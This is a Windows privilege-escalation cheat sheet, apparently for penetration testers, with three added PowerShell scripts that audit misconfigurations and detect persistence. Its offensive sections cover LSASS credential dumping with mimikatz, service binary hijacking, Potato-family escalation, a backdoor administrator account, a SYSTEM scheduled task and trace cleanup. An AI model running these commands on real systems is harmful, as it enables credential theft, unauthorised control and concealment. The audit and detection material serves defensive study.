Windows Privilege Escalation Methods
Usage notes: run the commands one at a time and record the output to analyse possible escalation paths. If further tooling is needed (such as PowerUp.ps1), load and run it from PowerShell. Work in a test environment to avoid putting production systems at risk.
🧭 I. Information Gathering
whoami → Show the current username and privilege level.
whoami /priv → List the current user's privileges (e.g. SeImpersonatePrivilege).
hostname → Get the hostname to identify the target system.
systeminfo → Show the OS version, installed patches and architecture.
wmic qfe get Caption,Description,HotFixID,InstalledOn → Enumerate installed hotfixes to look for clues to unpatched CVEs.
set → Print environment variables (TEMP, PATH, USERNAME, etc.).
echo %USERNAME% && echo %USERDOMAIN% → Get the current user and domain.
net users → Enumerate local user accounts.
net localgroup administrators → List members of the local Administrators group.
ipconfig /all → Network interfaces, DNS and gateway information.
route print → Routing table, to identify potential pivots and reachable subnets.
netstat -ano → Listening ports and their owning PIDs.
tasklist /svc → Running processes and the services mapped to them.
wmic service list brief → Quick enumeration of service state and start account.
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run → Find machine-wide autorun entries and paths that could be abused.
⚙️ II. Credential Harvesting
cmdkey /list → List credentials saved on the system.
runas /savecred /user:Administrator cmd.exe → Test whether saved credentials (if any) can be used.
type %APPDATA%\Microsoft\Credentials\* → Check possible credential store files.
findstr /si password *.txt *.ini *.config → Search files for traces of plaintext passwords.
reg query HKLM /f password /t REG_SZ /s → Search the registry for plaintext password fields.
mimikatz.exe (sekurlsa::logonpasswords) → Extract plaintext passwords, hashes and tickets from LSASS (only within the authorised scope).
🧱 III. Service Misconfiguration
sc qc <service_name> → Show the service binary path, start account and configuration.
icacls "C:\path\to\service.exe" → Check whether the service executable is writable.
sc config <service_name> binPath= "C:\evil.exe" → Change the service's executable path (requires permissions; commonly used for persistence).
accesschk.exe -uws "Everyone" "C:\Program Files\..." → Check for writable directories and service folder permissions.
wmic service get name,startname,pathname → List services in bulk with their start account and path.
🧩 IV. Autoruns / Scheduled Tasks
schtasks /query /fo LIST /v → Enumerate scheduled tasks and the commands they run.
icacls "C:\path\to\task.exe" → Check whether the program a scheduled task runs can be modified.
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run → Enumerate per-user autorun entries.
wmic startup get caption,command → Show startup items and their commands.
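The service and scheduled-task checks in sections III and IV (sc qc, icacls, accesschk, schtasks /query) boil down to one question: can a low-privileged principal replace the program that a privileged service or task runs? The following PowerShell script is an added audit example, not part of the original cheat sheet, that answers it for every service and every enabled task in one pass so the findings can be fixed. The principal list, the write-rights mask and the output layout are my own choices; run it from an elevated PowerShell so every service and task is readable.

```powershell
# Added audit example, not part of the original cheat sheet.
# Flags executables run by services or scheduled tasks that low-privileged
# principals can modify, plus unquoted service paths that contain spaces.

# Principals whose write access to a privileged binary is a finding
# (assumed list; extend it with your own low-privilege groups).
$LowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that allow replacing or retargeting a file. Generic-rights ACEs
# (GENERIC_ALL etc.) are not mapped here and will not be flagged.
$WriteMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, TakeOwnership, ChangePermissions'

function Get-ExecutableFromCommandLine {
    # Extracts the program path from a service PathName or a task action,
    # handling both quoted ("C:\a b\x.exe" -arg) and unquoted forms.
    param([string]$CommandLine)
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    $cl = $CommandLine.Trim()
    if ($cl.StartsWith('"')) {
        $end = $cl.IndexOf('"', 1)
        if ($end -gt 1) { return $cl.Substring(1, $end - 1) }
    }
    $m = [regex]::Match($cl, '^(.+?\.exe)(\s|$)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($cl -split '\s+')[0]
}

function Get-LowPrivWriters {
    # Returns the low-privileged principals holding write-class rights on $Path.
    param([string]$Path)
    $resolved = [Environment]::ExpandEnvironmentVariables($Path)
    if (-not (Test-Path -LiteralPath $resolved)) { return @() }
    $acl = Get-Acl -LiteralPath $resolved
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band [int]$WriteMask) -ne 0) {
            $ace.IdentityReference.Value
        }
    }
}

$findings = New-Object System.Collections.Generic.List[object]

# Services (section III): binary ACLs and unquoted paths with spaces.
foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $exe = Get-ExecutableFromCommandLine $svc.PathName
    if (-not $exe) { continue }
    if ($svc.PathName -notmatch '^\s*"' -and $exe -match ' ') {
        $findings.Add([pscustomobject]@{
            Type = 'Service'; Name = $svc.Name; RunsAs = $svc.StartName
            Path = $exe; Issue = 'Unquoted path with spaces'
        })
    }
    foreach ($who in Get-LowPrivWriters $exe) {
        $findings.Add([pscustomobject]@{
            Type = 'Service'; Name = $svc.Name; RunsAs = $svc.StartName
            Path = $exe; Issue = "Writable by $who"
        })
    }
}

# Scheduled tasks (section IV): ACLs of each Exec action's program.
foreach ($task in Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' }) {
    foreach ($action in $task.Actions) {
        if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
        $exe = Get-ExecutableFromCommandLine $action.Execute
        foreach ($who in Get-LowPrivWriters $exe) {
            $findings.Add([pscustomobject]@{
                Type = 'Task'; Name = "$($task.TaskPath)$($task.TaskName)"
                RunsAs = $task.Principal.UserId; Path = $exe; Issue = "Writable by $who"
            })
        }
    }
}

$findings | Sort-Object Type, Name | Format-Table -AutoSize
```

Every row is a remediation item: quote the service path (sc config ... binPath= with quotes), or remove the write ACE from the binary and its parent directory with icacls. Rows whose RunsAs is LocalSystem or S-1-5-18 are the ones to fix first.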
🧨 V. Privilege Escalation Primitives
whoami /priv → Confirm whether high-risk privileges are present (SeImpersonate, SeAssignPrimaryToken, etc.).
PrintSpoofer.exe -i -c cmd → Attempt escalation via SeImpersonatePrivilege (if present).
JuicyPotato.exe -t * -p cmd.exe -l 1337 → Escalation via RPC/COM (older systems or misconfigurations).
GodPotato.exe -cmd "cmd.exe" → Escalation attempt usable on newer systems (environment dependent).
🧰 VI. Software Exploitation
wmic product get name,version → List installed software and versions to compare against vulnerability databases.
dir "C:\Program Files" → Manually identify third-party software that may be insecure.
findstr /si "install" *.log *.txt → Search installation logs for leaked credentials or path information.
Match versions against CVE / ExploitDB / vendor advisories → Turn known vulnerabilities into a working exploit chain.
🗝️ VII. Registry Abuse
reg query HKLM\System\CurrentControlSet\Services → Find service registry keys that can be modified.
icacls C:\Windows\System32 → Check critical system directories for abnormal permissions.
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System → Check UAC and policy configuration.
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" → Check automatic logon settings such as AutoAdminLogon.
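The reg query commands in section VII print raw values and leave the comparison to the reader. As an added example (not from the original cheat sheet), the PowerShell script below reads the same Winlogon and UAC policy keys, marks each value WEAK or OK against a hardening baseline, and walks the Services key to list service registry keys that low-privileged principals can write to. The baseline values and the principal list are my own assumptions; adjust them to your policy. Run it elevated so every service key is readable.

```powershell
# Added audit example, not part of the original cheat sheet.
# Checks Winlogon and UAC policy values against a hardening baseline and lists
# HKLM\SYSTEM\CurrentControlSet\Services subkeys writable by low-privileged principals.

$Winlogon  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$UacPolicy = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

# Each check: registry key, value name, a test returning $true when the
# value is weak, and the finding text. Baseline is an assumption.
$Checks = @(
    @{ Key = $Winlogon;  Name = 'AutoAdminLogon';   Weak = { param($v) $v -eq '1' };                          Note = 'Automatic logon enabled' }
    @{ Key = $Winlogon;  Name = 'DefaultPassword';  Weak = { param($v) -not [string]::IsNullOrEmpty($v) };  Note = 'Plaintext logon password stored' }
    @{ Key = $UacPolicy; Name = 'EnableLUA';        Weak = { param($v) $v -eq 0 };                            Note = 'UAC disabled' }
    @{ Key = $UacPolicy; Name = 'ConsentPromptBehaviorAdmin'; Weak = { param($v) $v -eq 0 };                  Note = 'Administrators elevate without any prompt' }
    @{ Key = $UacPolicy; Name = 'PromptOnSecureDesktop';      Weak = { param($v) $v -eq 0 };                  Note = 'UAC prompt not shown on the secure desktop' }
    @{ Key = $UacPolicy; Name = 'LocalAccountTokenFilterPolicy'; Weak = { param($v) $v -eq 1 };               Note = 'Remote UAC token filtering disabled for local admins' }
)

function Get-RegValue {
    # Returns the value, or $null when the value or key is absent.
    param([string]$Key, [string]$Name)
    try { (Get-ItemProperty -Path $Key -Name $Name -ErrorAction Stop).$Name }
    catch { $null }
}

function Test-RegistryHardening {
    # One row per setting with its current value and a WEAK/OK verdict.
    foreach ($c in $Checks) {
        $value = Get-RegValue -Key $c.Key -Name $c.Name
        $shown = if ($null -eq $value) { '<absent>' } else { $value }
        $status = if (& $c.Weak $value) { "WEAK: $($c.Note)" } else { 'OK' }
        [pscustomobject]@{ Setting = "$($c.Key)\$($c.Name)"; Value = $shown; Status = $status }
    }
}

# Principals whose write access to a service key is a finding (assumed list).
$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$RegWriteMask = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, WriteKey, FullControl, TakeOwnership, ChangePermissions'

function Get-WritableServiceKeys {
    # Lists service registry keys where a low-privileged principal can change
    # ImagePath, ObjectName or other values (read-only ACEs are ignored).
    $services = Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue
    foreach ($key in $services) {
        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (([int]$ace.RegistryRights -band [int]$RegWriteMask) -ne 0) {
                [pscustomobject]@{ ServiceKey = $key.PSChildName; WritableBy = $ace.IdentityReference.Value; Rights = $ace.RegistryRights }
            }
        }
    }
}

Test-RegistryHardening | Format-Table -AutoSize
Get-WritableServiceKeys | Format-Table -AutoSize
```

A WEAK row on DefaultPassword means a cleartext credential is readable by anyone who can query the key; remove it and disable AutoAdminLogon together. A writable service key lets a standard user change the service's ImagePath or ObjectName, so reset its ACL to the inherited default rather than just editing the values.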
🕵️ VIII. Token & Process Hijacking
whoami /groups → Show the current user's groups and available tokens.
tasklist /fi "username eq SYSTEM" → Find SYSTEM-level processes to assess token theft opportunities.
psexec.exe -s cmd.exe → Run a command locally as SYSTEM with PsTools (requires permission to execute).
Use Process Explorer for visual token and handle analysis → Find process tokens that could be borrowed.
🧿 IX. Automation Tools
winPEASx64.exe → Automated enumeration of potential escalation vectors and misconfigurations.
Seatbelt.exe → Quickly collect system security and configuration information.
PowerUp.ps1 → PowerShell-scripted privilege escalation checks.
SharpUp.exe → C# version of the escalation checks, suited to red team and internal network scenarios.
PrivescCheck.ps1 → Comprehensive PowerShell privilege escalation scan.
🔥 X. Persistence & Cleanup
net user backdoor P@ssw0rd /add → Create a spare user (mind compliance and authorisation).
net localgroup administrators backdoor /add → Add the backdoor user to the Administrators group.
schtasks /create /tn "UpdateCheck" /tr "cmd.exe /c whoami > C:\proof.txt" /sc onlogon /ru SYSTEM → Create a persistent scheduled task running as SYSTEM.
del /f /q C:\Windows\Temp\* → Clean up traces (operate with care; log actions for audit).
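Each of the three persistence actions in section X (net user /add, net localgroup administrators /add, schtasks /create) leaves a Security log event: 4720 for the account, 4732 for the group membership, 4698 for the task. The PowerShell script below is an added detection example, not part of the original cheat sheet; it collects those events for the last few days, rates a task that runs as SYSTEM or a change to Administrators as High, and compares the current Administrators membership with an expected baseline. The lookback window and the $ExpectedAdmins list are placeholders to replace with your own. It needs an elevated session, and the events only exist if the User Account Management, Security Group Management and Other Object Access audit categories are enabled.

```powershell
# Added detection example, not part of the original cheat sheet.
# Surfaces local-account creation (4720), local-group additions (4732) and
# scheduled-task creation (4698) from the Security log, then checks the
# Administrators group against an expected member list.

$LookbackDays = 7
# Placeholder baseline: replace with the accounts that should be local admins.
$ExpectedAdmins = @("$env:COMPUTERNAME\Administrator")

function Get-EventDataField {
    # Reads one named <Data> element from the event's EventData XML.
    param($Event, [string]$Name)
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

function Resolve-Sid {
    # Translates a SID to DOMAIN\name; falls back to the raw SID.
    param([string]$Sid)
    try { (New-Object System.Security.Principal.SecurityIdentifier($Sid)).Translate([System.Security.Principal.NTAccount]).Value }
    catch { $Sid }
}

function Get-PersistenceEvents {
    param([int]$Days = $LookbackDays)
    $filter = @{ LogName = 'Security'; Id = 4720, 4732, 4698; StartTime = (Get-Date).AddDays(-$Days) }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        $actor = Get-EventDataField $e 'SubjectUserName'
        switch ($e.Id) {
            4720 {
                $target = Get-EventDataField $e 'TargetUserName'
                [pscustomobject]@{ Time = $e.TimeCreated; Id = 4720; Actor = $actor; Severity = 'Medium'
                                   Detail = "Local account created: $target" }
            }
            4732 {
                $group  = Get-EventDataField $e 'TargetUserName'
                $member = Resolve-Sid (Get-EventDataField $e 'MemberSid')
                $sev = if ($group -eq 'Administrators') { 'High' } else { 'Medium' }
                [pscustomobject]@{ Time = $e.TimeCreated; Id = 4732; Actor = $actor; Severity = $sev
                                   Detail = "Member $member added to local group $group" }
            }
            4698 {
                $name = Get-EventDataField $e 'TaskName'
                $runAs = ''; $cmd = ''
                try {
                    # TaskContent carries the task XML, including principal and actions.
                    $t = [xml](Get-EventDataField $e 'TaskContent')
                    $runAs = $t.Task.Principals.Principal.UserId
                    $cmd   = $t.Task.Actions.Exec.Command
                } catch { }
                $sev = if ($runAs -match '^(S-1-5-18|.*SYSTEM)$') { 'High' } else { 'Medium' }
                [pscustomobject]@{ Time = $e.TimeCreated; Id = 4698; Actor = $actor; Severity = $sev
                                   Detail = "Task $name created, runs as '$runAs': $cmd" }
            }
        }
    }
}

function Get-UnexpectedAdmins {
    # Current Administrators members that are not in the baseline list.
    param([string[]]$Expected = $ExpectedAdmins)
    Get-LocalGroupMember -Group 'Administrators' |
        Where-Object { $Expected -notcontains $_.Name } |
        Select-Object Name, ObjectClass, PrincipalSource
}

Get-PersistenceEvents | Sort-Object Time -Descending | Format-Table -AutoSize -Wrap
Get-UnexpectedAdmins | Format-Table -AutoSize
```

The Actor column is the account that made the change; a 4698 or 4732 raised by an account that should not be administering the host is the signal to chase, and the task's Command field shows where it writes. Clearing C:\Windows\Temp (the last item in section X) does not touch these events, so the Security log remains the record to forward to a SIEM.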